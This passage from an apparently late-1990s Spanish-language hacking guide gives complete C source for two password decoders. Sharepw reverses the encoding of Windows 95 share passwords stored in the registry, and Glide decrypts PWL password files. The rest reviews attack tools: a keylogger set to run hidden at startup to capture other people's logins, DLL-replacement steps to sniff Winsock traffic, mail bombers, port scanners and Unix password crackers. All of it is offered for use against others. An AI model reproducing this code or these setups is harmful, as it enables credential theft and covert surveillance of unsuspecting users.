- * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
- *
- * A technical description of the 'code' can be found later on in this
- * document.
- *
- * Oh yeah... a totally unsolicited self promotion here... If anyone has
- * a job for a junior year Computer Science student for summer '96, please
- * let me know! I'm familiar with Windows and Mac networking (especially
- * involving TCP/IP), fluent in C and C++, and working on becoming a
- * proficient Windows programmer.
- *
- */
-
- #include <stdio.h>
- #include <string.h>
-
- #define BUFFER 30
-
- int DecodeCharOne(unsigned char *);
- int DecodeCharTwo(unsigned char *);
- int DecodeCharThree(unsigned char *);
- int DecodeCharFour(unsigned char *);
- int DecodeCharFive(unsigned char *);
- int DecodeCharSix(unsigned char *);
- int DecodeCharSeven(unsigned char *);
- int DecodeCharEight(unsigned char *);
-
- main() {
-
- int i; /* Generic counter */
- int eocc = 0; /* Records if there has been an error */
-
- /* The following structure stores the encoded bytes. Decoded values
- * replace the encoded values as the decoding process moves along
- * The initial values show here are not used and are unimportant
- */
- unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
- unsigned short tempshort; /* Used as a go-between from sscanf() to
- mybytes[] so unaligned data accesses
- don't occur */
-
- int goupto = 0; /* Records how many characters there are to be decoded */
-
- /* The following code handles input */
- char inpt[BUFFER];
- char *inptptr;
-
- printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
- fgets(inpt, BUFFER, stdin);
-
- inptptr = strtok(inpt, " ");
- if (inpt[0] != '\n')
- while ((inptptr != NULL) && (goupto < 8)) {
- sscanf(inptptr, "%hx", &tempshort);
- mybytes[goupto++] = tempshort;
- inptptr = strtok(NULL, " ");
- }
-
- /* Decode all the characters. I could have made this stop immediately
- * after an error has been found, but it really doesn't matter
- */
- if (!DecodeCharOne(&mybytes[0])) eocc = 1;
- if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
- if (!DecodeCharThree(&mybytes[2])) eocc = 1;
- if (!DecodeCharFour(&mybytes[3])) eocc = 1;
- if (!DecodeCharFive(&mybytes[4])) eocc = 1;
- if (!DecodeCharSix(&mybytes[5])) eocc = 1;
- if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
- if (!DecodeCharEight(&mybytes[7])) eocc = 1;
-
- /* If the password could be decoded, print it */
- if (eocc) printf("The encrypted password is invalid.\n");
- else {
- printf("The decoded password is: \"");
- for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
- printf("\"\n");
- }
- } /* End of main() */
-
- /*
- * I will document this function, but not the seven other functions
- * which decode the subsequent seven characters. All of these functions
- * are essentially the same. Multiple functions are necessary though
- * because each column of the password has a different set of encoding
- * patterns.
- *
- * The following section will attempt to explain the encoding scheme
- * for share passwords as stored in the Windows 95 registry. I will
- * try to explain this as clearly as I can, however I really have no
- * background in encryption. If you have any questions, please feel
- * free to send them to me at snakey@cs.umd.edu.
- *
- * First off, share passwords can be anywhere from one character to
- * eight. "Read only" passwords and "Full access" passwords both use
- * the same encoding scheme, and so they both can be decoded by this
- * program. There is a one-to-one relationship between the number of
- * characters in a password and the number of bytes in the encoded
- * password stored in the registry. In fact, each encoded byte directly
- * corresponds to the letter in the corresponding column of the
- * unencoded password! Ie: If I change a password "passwd" to "masswd",
- * only the first byte of the encrypted password will change. Knowing
- * this, it is easy to see that all that needs to be done to decode
- * the password is to find a mapping from an encoded byte to a decoded
- * letter. That's what this program does. Unfortunately, things get
- * a little tricky because a letter in the first column of a password
- * is encoded using a slightly different algorithm than a letter
- * in the second column, and so on.
- *
- * There is another complexity which we do not really need to worry
- * about to a great extent, but we still need to be aware of. Many
- * characters, when entered into a password, map to the same encoded
- * byte. The best example of this is that both 'A' and 'a' are the
- * same as far as share passwords are concerned. There are numerous
- * other examples of this, and this allows us to effectively limit the
- * range of characters we need to be able to decode. The range of
- * ASCII values we will have to be able to decode turns out to be
- * from 32 to 159. ASCII values higher than 159 tend to map to
- * encoded bytes which also represent more normal ASCII values. So
- * if a user manages to create a password with high ASCII values
- * in it, that password will still be decoded by this program.
- * Although the decoded password won't look the same as the original,
- * it will work just as well.
- *
- * With all of the preliminaries out of the way, I can now move on
- * to describing the mapping from an encoded byte to it's corresponding
- * ASCII value. I think the best way to describe this would be through
- * a picture of exactly how the characters from 32 to 63 are mapped
- * out in the code for the first letter in a password. This table goes
- * beyond the 80 column format maintained in the rest of this document,
- * but it is really the best solution. If the table below doesn't look
- * right, load this file up in a text editor that supports greater than
- * 80 columns.
- *
- * Encoded byte (hex) - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
- 0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
- * ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
- 58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
- * Pair # - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
- |14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
- * Quad # - |__________2__________| |__________1__________|
- |__________3__________| |__________4__________|
- * 32 byte block # - |______________________________________________
- 1______________________________________________|
- *
- * The "Pair #", "Quad #", and "32 byte block #" rows each are there to
- * make the general ordering of the code more visible. The first thing to
- * note is that the range of encoded byte values runs from 00 to 1f. This
- * will not always be the case for the first set of 32 characters. In
- * fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
- * the range of 20 to 3f in encoded form. I never concerned myself with
- * predicting exactly where each of the four 32 byte ranges are aligned
- * within the range of 0 to 256. In my decoding scheme, I simply specify
- * the location of the first character in a 32 byte block (which I have
- * pre-determined via experimentation) and determine the locations of the
- * rest of the characters in the block relative to the inital value. This
- * amounts to a total of four hand-decoded characters for the entire code.
- *
- * From a starting point which is given (in this case the fact that ASCII
- * 32 is encoded as 0x15), my decoding scheme follows a pattern that is
- * probably already apparent to you if you have examined the above table
- * closely. First, if the encoded byte number is odd, it simple subtracts
- * one from this byte number to get the byte number of the encoded form of
- * the subsequent character. This is much more simple than it sounds.
- * As an example, given that the code for ASCII 32 is 0x15, the program
- * knows that the code for ASCII 33 must be 0x14. The tricky part is that
- * this is not always true for every code. Recall that there is a different
- * coding scheme for each of the 8 columns in a password, and that the above
- * table only describes the coding scheme for the first column. Other columns
- * reverse this relationship between the two ASCII values of a certain pair.
- *
- * Pairs are grouped into units of four, appearing in a predefined pattern.
- * In this case, the first pair (by first I mean the pair with the lowest
- * set of ASCII values) is put in the second slot of a quad (which contains
- * four pairs). The second pair is put in the first slot, the third is put
- * in the fourth quad, and the fourth is put in the third quad. This changes
- * depending on the specific code used (of the 8 possible).
- *
- * Quads also fill a block in the same manner, however the ordering is NOT
- * necessarily the same as the way pairs fit into quads! As I described
- * above, there are four blocks, and they fit into the entire range of
- * 128 values just as pairs fit into quads and quads fit into blocks,
- * via a pattern determined by whoever invented this encoding scheme. It
- * is important to realize that the range of 128 possible encoded
- * values can be anywhere within the range of 0 to 256. Ie: One block can
- * be positioned from 0x00 to 0x1f, while another block in the same code
- * can be positioned from 0xa0 to 0xbf.
- *
- * I realize that the above description is a bit complex, and it doesn't
- * really cover much of _how_ my program decodes the the encoded values.
- * If you honestly can't understand a word I've said, just go back to
- * the table and really take a long look at it. Print it out, put it
- * under your pillow when you go to sleep. Sooner or later the order
- * of it all will dawn on you and you should be able to step through
- * my code and see how it derives its answer, at least for the
- * DecodeCharOne() routine. Seven other tables (which I have rough
- * copies of here on notebook paper) were needed to come up with
- * the seven other decoders for the seven other character places.
- *
- */
-
- int DecodeCharOne(unsigned char *mychar) {
- int i = 0; /* Keeps track of the decoded character # minus 32 */
- int cletter = 1; /* Sets the current letter of the 8 char quad */
- int blockl1 = 1; /* Sets the current quad */
- int blockl2 = 1; /* Sets the current 32 char block */
- int retval = 1;
- /* We are on this col of the table: */
- unsigned char code = 0x15; /* The code for a space */
-
- /* This is the main loop. It walks through each decoded character, finds
- * its corresponding encoded value, and looks to see if that's the same as
- * the encoded value we are looking for. If it is, we have found our
- * decoded character!
- */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code--;
- cletter++;
- break;
- case 2:
- code += 3;
- cletter++;
- break;
- case 3:
- code--;
- cletter++;
- break;
- case 4:
- code -= 5;
- cletter++;
- break;
- case 5:
- code--;
- cletter++;
- break;
- case 6:
- code+=3;
- cletter++;
- break;
- case 7:
- code--;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) { /* After we hit character number 8, we have */
- case 1: /* to do a relative jump to the next quad */
- code += 11;
- blockl1++;
- break;
- case 2:
- code -= 21;
- blockl1++;
- break;
- case 3:
- code += 11;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) { /* After we hit the last quad, we have to */
- case 1: /* jump to the next 32 character block. */
- code = 0x75;
- blockl2++;
- break;
- case 2:
- code = 0x55;
- blockl2++;
- break;
- case 3:
- code = 0xb5;
- blockl2++;
- break;
- case 4:
- code = 0x15;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharOne() */
-
- int DecodeCharTwo(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0xba; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code++;
- cletter++;
- break;
- case 2:
- code -= 3;
- cletter++;
- break;
- case 3:
- code++;
- cletter++;
- break;
- case 4:
- code += 5;
- cletter++;
- break;
- case 5:
- code++;
- cletter++;
- break;
- case 6:
- code -= 3;
- cletter++;
- break;
- case 7:
- code++;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code -= 11;
- blockl1++;
- break;
- case 2:
- code -= 11;
- blockl1++;
- break;
- case 3:
- code -= 11;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0xda;
- blockl2++;
- break;
- case 2:
- code = 0xfa;
- blockl2++;
- break;
- case 3:
- code = 0x1a;
- blockl2++;
- break;
- case 4:
- code = 0xba;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharTwo() */
-
- int DecodeCharThree(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0x6d; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code--;
- cletter++;
- break;
- case 2:
- code += 3;
- cletter++;
- break;
- case 3:
- code--;
- cletter++;
- break;
- case 4:
- code -= 5;
- cletter++;
- break;
- case 5:
- code--;
- cletter++;
- break;
- case 6:
- code += 3;
- cletter++;
- break;
- case 7:
- code--;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code -= 5;
- blockl1++;
- break;
- case 2:
- code += 27;
- blockl1++;
- break;
- case 3:
- code -= 5;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0x0d;
- blockl2++;
- break;
- case 2:
- code = 0x2d;
- blockl2++;
- break;
- case 3:
- code = 0xcd;
- blockl2++;
- break;
- case 4:
- code = 0x6d;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharThree() */
-
- int DecodeCharFour(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0x86; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code++;
- cletter++;
- break;
- case 2:
- code -= 3;
- cletter++;
- break;
- case 3:
- code++;
- cletter++;
- break;
- case 4:
- code -= 3;
- cletter++;
- break;
- case 5:
- code++;
- cletter++;
- break;
- case 6:
- code -= 3;
- cletter++;
- break;
- case 7:
- code++;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code += 13;
- blockl1++;
- break;
- case 2:
- code += 13;
- blockl1++;
- break;
- case 3:
- code += 13;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0xe6;
- blockl2++;
- break;
- case 2:
- code = 0xc6;
- blockl2++;
- break;
- case 3:
- code = 0x26;
- blockl2++;
- break;
- case 4:
- code = 0x86;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharFour() */
-
- int DecodeCharFive(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0x73; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code--;
- cletter++;
- break;
- case 2:
- code--;
- cletter++;
- break;
- case 3:
- code--;
- cletter++;
- break;
- case 4:
- code += 7;
- cletter++;
- break;
- case 5:
- code--;
- cletter++;
- break;
- case 6:
- code--;
- cletter++;
- break;
- case 7:
- code--;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code += 7;
- blockl1++;
- break;
- case 2:
- code -= 25;
- blockl1++;
- break;
- case 3:
- code += 7;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0x13;
- blockl2++;
- break;
- case 2:
- code = 0x33;
- blockl2++;
- break;
- case 3:
- code = 0x23;
- blockl2++;
- break;
- case 4:
- code = 0x73;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharFive() */
-
- int DecodeCharSix(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0x89; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code--;
- cletter++;
- break;
- case 2:
- code += 3;
- cletter++;
- break;
- case 3:
- code--;
- cletter++;
- break;
- case 4:
- code += 3;
- cletter++;
- break;
- case 5:
- code--;
- cletter++;
- break;
- case 6:
- code += 3;
- cletter++;
- break;
- case 7:
- code--;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code -= 13;
- blockl1++;
- break;
- case 2:
- code += 19;
- blockl1++;
- break;
- case 3:
- code -= 13;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0xe9;
- blockl2++;
- break;
- case 2:
- code = 0xc9;
- blockl2++;
- break;
- case 3:
- code = 0x29;
- blockl2++;
- break;
- case 4:
- code = 0x89;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharSix() */
-
- int DecodeCharSeven(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0xf4; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code++;
- cletter++;
- break;
- case 2:
- code++;
- cletter++;
- break;
- case 3:
- code++;
- cletter++;
- break;
- case 4:
- code -= 7;
- cletter++;
- break;
- case 5:
- code++;
- cletter++;
- break;
- case 6:
- code++;
- cletter++;
- break;
- case 7:
- code++;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code += 9;
- blockl1++;
- break;
- case 2:
- code -= 23;
- blockl1++;
- break;
- case 3:
- code += 9;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0x94;
- blockl2++;
- break;
- case 2:
- code = 0xb4;
- blockl2++;
- break;
- case 3:
- code = 0x54;
- blockl2++;
- break;
- case 4:
- code = 0xf4;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharSeven() */
-
- int DecodeCharEight(unsigned char *mychar) {
- int i = 0;
- int cletter = 1;
- int blockl1 = 1;
- int blockl2 = 1;
- int retval = 1;
- unsigned char code = 0x4a; /* The code for a space */
- while((i<256) && (code != *mychar)) {
- switch (cletter) {
- case 1:
- code++;
- cletter++;
- break;
- case 2:
- code -= 3;
- cletter++;
- break;
- case 3:
- code++;
- cletter++;
- break;
- case 4:
- code += 5;
- cletter++;
- break;
- case 5:
- code++;
- cletter++;
- break;
- case 6:
- code -= 3;
- cletter++;
- break;
- case 7:
- code++;
- cletter++;
- break;
- case 8:
- cletter = 1;
- switch (blockl1) {
- case 1:
- code -= 11;
- blockl1++;
- break;
- case 2:
- code += 21;
- blockl1++;
- break;
- case 3:
- code -= 11;
- blockl1++;
- break;
- case 4:
- blockl1 = 1;
- switch (blockl2) {
- case 1:
- code = 0x2a;
- blockl2++;
- break;
- case 2:
- code = 0x0a;
- blockl2++;
- break;
- case 3:
- code = 0xea;
- blockl2++;
- break;
- case 4:
- code = 0x4a;
- blockl2 = 1;
- break;
- }
- break;
- }
- break;
- }
- i++;
- }
- if (i == 256) retval = 0;
- else *mychar = i + 32;
- return retval;
- } /* End of DecodeCharEight() */
-
- /* End of program */
-
- ------------ FIN -------------------------------------------------------------
-
- Cuando ejecutemos el programa nos saldra esto:
-
- c:\>sharepw
- Input the byte code in hex (ex: 76 d5 09 e3):
-
- Nos pide que introduzcamos el password en formato Hexadecimal. Hay muchas
- tablas por Internet para aquellos que no tengan una.
-
- 5-6. Snadboy's revelation v1.1.
-
- En este apartado hablare sobre una interesante herramienta. El Snadboy es
- una tool que nos descripta los astericos de la tipica ventana que pide
- password. Si hay una ventana con un password y que no entendemos porque
- solo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy y
- situarnos al lado de la ventana de password, la ventana del Snadboy tiene
- una "mira de punto", pinchamos encima de la mira y la arrastramos con el
- raton sobre la ventana del password situandonos encima del password,
- soltamos y en la ventana del Snadboy veremos el password descifrado.
-
- Como nota, este programa para lo que hace, ocupa mucho en el disco duro,por
- lo que puede ser un poco sospechoso o que los coders no lo han optimizado
- demasiado que digamos.
-
- 5-7. Keylog95.
-
- Este programa nos sera muy util en sitio donde halla mucha gente, ya que
- es un Key recoder, o sea, una pequeña utilidad que se queda residente
- en memoria y graba todos los logins y password que la gente vaya metiendo.
-
- El programa es de sencillo manejo, pero tiene que haver unos pequeños
- requisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en el
- directorio c:\windows\system y ademas tener un directorio llamado c:\win,
- ya que es alli donde el programa grabara la informacion que obtenga, en
- un fichero llamado "logx", por lo que esto quedara:
-
- c:\win\logx
-
- Cuando las librerias esten metidas en el directorio System, windows creara
- un icono en la carpeta de Inico, por lo que es conveniente darle un
- atributo de Minimizado para que nadie lo pueda ver y asi siempre que se
- arranque Windows tambien lo hara el Keylog95 :)
-
- 5-8. Glide.
-
- El Glide es otro programa que sirve para desencriptar un password's en
- Win95/98. Al igual que el Sharepw solo lo tenemos que compiLar y ejecutar
- con la salvedad que esta escrito en C++.
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- #include <stdio.h>
- #include <string.h>
- #include <process.h>
- #include <stdlib.h>
- #include <ctype.h>
- #include <conio.h>
-
- unsigned char huge Data[100001];
- unsigned char keystream[1001];
- int Rpoint[300];
-
- void main (int argc,char *argv[]) {
- FILE *fd;
- int i,j,k;
- int size;
- char ch;
- char *name;
- int cracked;
- int sizemask;
- int maxr;
- int rsz;
- int pos;
- int Rall[300]; /* recource allocation table */
-
-
- if (argc<2) {
- printf("usage: glide filename (username)");
- exit(1);
- }
-
- /* read PWL file */
-
- fd=fopen(argv[1],"rb");
- if(fd==NULL) {
- printf("can't open file %s",argv[1]);
- exit(1);
- }
- size=0;
- while(!feof(fd)) {
- Data[size++]=fgetc(fd);
- }
- size--;
- fclose(fd);
-
- /* find username */
- name=argv[1];
- if(argc>2) name=argv[2];
- printf("Username: %s\n",name);
-
- /* copy encrypted text into keystream */
- cracked=size-0x0208;
- if(cracked<0) cracked=0;
- if(cracked>1000) cracked=1000;
- memcpy(keystream,Data+0x208,cracked );
-
- /* generate 20 bytes of keystream */
- for(i=0;i<20;i++) {
- ch=toupper(name[i]);
- if(ch==0) break;
- if(ch=='.') break;
- keystream[i]^=ch;
- };
- cracked=20;
-
-
- /* find allocated recources */
-
- sizemask=keystream[0]+(keystream[1]<<8);
- printf("Sizemask: %04X\n",sizemask);
-
- for(i=0;i<256;i++) Rall[i]=0;
-
- maxr=0;
- for(i=0x108;i<0x208;i++) {
- if(Data[i]!=0xff) {
- Rall[Data[i]]++;
- if (Data[i]>maxr) maxr=Data[i];
- }
- }
- maxr=(((maxr/16)+1)*16); /* recource pointer table size appears
- to be divisable by 16 */
-
- /* search after recources */
-
- Rpoint[0]=0x0208+2*maxr+20+2; /* first recource */
- for(i=0;i<maxr;i++) {
- /* find size of current recource */
- pos=Rpoint[i];
- rsz=Data[pos]+(Data[pos+1]<<8);
- rsz^=sizemask;
- printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i
- ,Rall[i]);
- if( (Rall[i]==0) && (rsz!=0) ) {
- printf("unused resource has nonzero size !!!\n");
- printf("If last line produced any : You
- may try to recover\n");
- printf("press y to attempt recovery\n");
- ch=getch();
- if(ch!='y') exit(0);
- rsz=2;
- i-=1;
- }
-
- pos+=rsz;
-
- /* Resources have a tendency to have the wrong size for
- some reason */
- /* check for correct size */
-
- if(i<maxr-1) {
- while(Data[pos+3]!=keystream[1]) {
- printf(":",Data[pos+3]);
- pos+=2; /* very rude may fail */
- }
- }
-
- pos+=2; /* include pointer in size */
- Rpoint[i+1]=pos;
- }
- Rpoint[maxr]=size;
-
- /* insert Table data into keystream */
- for(i=0;i <= maxr;i++) {
- keystream[20+2*i]^=Rpoint[i] & 0x00ff;
- keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
- }
- cracked+=maxr*2+2;
-
- printf("%d bytes of keystream recovered\n",cracked);
-
- /* decrypt resources */
- for(i=0;i < maxr;i++) {
- rsz=Rpoint[i+1]-Rpoint[i];
- if (rsz>cracked) rsz=cracked;
- printf("Recource[%d] (%d)\n",i,rsz);
- for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
- printf("\n");
- }
- exit(0);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- Cuando lo ejecutemos nos saldra lo siguiente:
-
- c:\>glide
- usage: glide filename (username)
-
- Pidiendo el fichero y el login.
-
- 5-9. Win95 anonymail v 1.0.
-
- Este sencillo programa nos sera de gran ayuda para enviar mail anonimo.
- Cuando ejecutemos el programa nos saldra una ventana con los siguientes
- campos:
-
- Host
-
- From
-
- To
-
- Subject
-
- Solo tenemos que rellenarlos correctamente y pulsar el "send" para enviar
- el mail anonimo y cuando hayamos acabado pulsar "quit".
-
- Un programa muy sencillo que nos puede ser util. Como nota, el autor nos
- advierte que nadie le envie mail anonimo con su programa, por lo que se
- puede deducir que es un farol o que el programa no es tan anonimo, por
- lo que el autor le habra metido un troyano.
-
- 5-10. Hacker's Utility, V 1.02.
-
- Este magnifico programa es una suite para Hackers. Para que nos entendamos,
- este programa esta compuesto por muchos otros programas y asi dispones
- de un paquete perfecto para un Hacker.
-
- Cuando ejecutamos este programa nos aparecera una ventana con un menu
- arriba, y cuando abramos una de estas opciones se abrira otra ventana
- con mas opciones. Ahora podemos ver el menu principal compuesto por
- los submenus:
-
- File -> HU setup, exit
-
- Cracking -> crack passwords -> crack zip passwords
- crack passwd files
- passwd jackpot
- words prcessing -> words wizard
- xtrakt words
- sort
-
- Tools -> create & fill a dummy fill, compare binary files
-
- Network -> finger, port scanner, ip <> name converter
-
- Other Stuff -> hackers's test, serial numbers, extracting/ripping sound
- files, extracting/ripping graphic files, manual extract/
- rip files
-
- System -> dos prompt, run custom application, shut down
-
- Window -> cascade, tile horizontal, tile vertical, arrange icons,
- main toolbar, main status bar
-
- Help -> tip of day, index, using help, about Hacker's Utility
-
- La verdad es que esta suite esta muy completa y nos sera de gran ayuda. Por
- ejemplo el sistema se puede configurar en File->HU setup para que sea mas
- personal. Cabe destacar ciertas utilidades como los crackeadores que tiene
- incorporados para crackear el passwd de un Unix o romper el password de
- un fichero zip. Luego en la seccion de Network, las utilidades nos seran
- de mucha ayuda, como el Finger, el scaneador de puertos y el convertidor
- de direcciones IP. Esto en mi opion seria lo mejor del programa pero
- luego trae otras cosas que tambien nos pueden servir para al menos
- divertinos un rato, esto es el caso del Hacker's Test, por ejemplo podemos
- activar el Port Scanner y mientras esperamos a los resultados podemos
- hacer un test para saber si somos buenos Hackers.
-
- La verdad es que es una magnifica herramienta que los Hackers de win deben
- tener.
-
- 5-11. Haktek v1.1.
-
- AL igual que el HU, Haktek, es una suite que tambien nos sera de gran
- ayuda. Pero esta suite esta mas enfocada a atacar por Internet, logicamente
- con el peligro que ello conlleva.
-
- Al ejecutar el programa, se abrira una ventana en la que veremos una serie
- de iconos en la parte izquierda de la ventana y una pantalla de texto que
- nos explica cada icono. Empezando de arriba para abajo:
-
- Diskette-> graba la sesion (lo que esta en pantalla y lo que hallamos hecho
- con el programa).
-
- X -> prepara la sesion, borrando la pantalla de texto.
-
- ? -> nos habla sobre sus autores.
-
- Circulo -> señalos un objetivo, por defecto www.microsoft.com.
-
- Antena -> Utilidad ping.
-
- Gafas -> scaneador de puertos.
-
- Bomba -> bombardeador de correo.
-
- Stop bomb -> para protegernos de un mailbomber.
-
- Radio -> scaneador de IP'S.
-
- Prismaticos -> para enviar finger nulos.
-
- La verdad es que es una suite muy completa y nos ayudara a joder a todo
- el que se ponga por delante. Con un poco de practica dominaremos este
- programa a la perfeccion.
-
- 5-12. Claymore Brute Force.
-
- Esta utlidad no sera de gran ayuda para desemcriptar passowrd's de un
- fichero passwd de Unix. Cuando lo ejecutemos se abrira una ventana con
- varias opciones, de facil manejo, para aquellos que quieren algo simple y
- corriendo sobre win95. Este crackeador es de fuerza bruta pudiendo ser
- algo lento.
-
- 5-13. Skream's Port Listener V 2.3.
-
- En muchas ocasiones nos gustaria saber que pasa en nuestros puertos, esta
- simple pero estupenda herramienta nos sera muy util, ya que la podemos
- ejecutar y configurarla para que escuche en el puerto que queramos, asi
- podemos saber quien o que esta conectado a nuestros puertos. Por defecto
- el programa escucha en el puerto 139 (os suena?)
-
- El programa nos permite escuchar en el puerto que querramos, ademas podemos
- logear todo el proceso en un fichero.
-
- 5-14. WSOCK32 Winsock Spy Facility Version .91
-
- Podemos usar esta DLL para espiar un sistema informatico, ya que es un
- sniffer :), solo funciona en Win95/98. No es dificil de utilizar, los pasos
- a seguir son:
-
- #1- Copiar el WSOCK32.DLL y ubicarlo en el directorio del programa que
- querramos espiar.
-
- #2- Configurar las siguientes variables:
-
- > SET WSOCK_LOG=LOG
- > SET WSOCK_FLAGS=s
-
- #3- Normalmente Windows instala el estandar WSOCK32.DLL en la siguiente ruta
- C:\WINDOWS\SYSTEM\WSOCK32.DLL por eso debemos configurar el path de
- nuestra DLL, en el lugar donde este de la siguiente manera:
-
- > SET WSOCK_PATH=<el path de nuestro WSOCK32.DLL>
-
- #4- Ejecutar el programa WinSock.
-
- #5- Recibiras un mensaje que esta logeando.
-
- #6- Ya puedes salir del programa.
-
- #7- Busca un fichero llamado LOG.XXX donde las XXX son tres digitos en
- hexadecimal.
-
- #8- El fichero Log contendra toda la sesion del Winsock :)
-
- El programa dispone de mas opciones de configuracion, que podemos ver como
- usar leyendo la estupenda documentacion de trae. Ahora ya no tenemos excusa
- alguna de que no podemos pillar "informacion sensible."
-
- 5-15. PWlTool V 4.0.
-
- Podemos usar esta herramienta para desencriptar los famosos pwl's. La verdad
- es que es una herramienta muy interesante y potente. Al ejecutar el programa
- nos aparecera una ventana con multitud de opciones, incluso el nombre del
- usuario que estemos usando en el momento.
-
- El programa nos permite buscar passwords (o sea ficheros pwl's), ademas
- tambien comprueba a los usuarios. El programa lo podemos dejar en modo
- zombie, eso significa que trabaja en background y no nos daremos cuenta que
- esta desencriptando los passwords, ademas es el modo que se recomienda
- utilizar.
-
- Es una herramienta de considero bastante completa y vital para todo aquel
- hacker de Windows.
-
- 5-16. PwlView V 1.01.
-
- Volvemos con otro programa para averiguar los ficheros pwl's :) Ejecutamos
- el siguiente fichero :
-
- c:\>pwlview
- There is no security in this crazy world!
- Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas
- http://webdon.com, e-mail:vitas@webdon.com vitas@rocketmail.com, ICQ:3024702
-
- ************
- !DISCLAIMER!
- !This program intended to be used for legal purpose only!
- ************
-
- This program shows cached passwords using standard (but undocumented)
- Windows API on local machine for current user (user must be logged in).
- There is much more powerful version of this program named pwltool
- is available at http://webdon.com/vitas . But it has larger size...
- You may invoke pwlview in this way: pwlview >> textfile.txt
- to save passwords in file (don't forget to press enter twice)
- Press Enter to begin...
-
- Y este es el mensaje que nos saca, el programa esta esperando a que pulsemos
- el "boton cualquiera" para buscar los pwl's, ahora aprieto el boton y me
- sale lo siguiente:
-
- No passwords found.
- Probably password caching was not used or user is not logged in.
-
- Press Enter to quit
-
- En mi caso sale negativo, debido a que no tengo ningun fichero pwl's :) Otro
- programa que nos conviene tener en nuestras coleccion de herramientas.
-
- 6. Medidas De Seguridad.
-
- En esta seccion hablare sobre varios aspectos muy importanes, logicamente
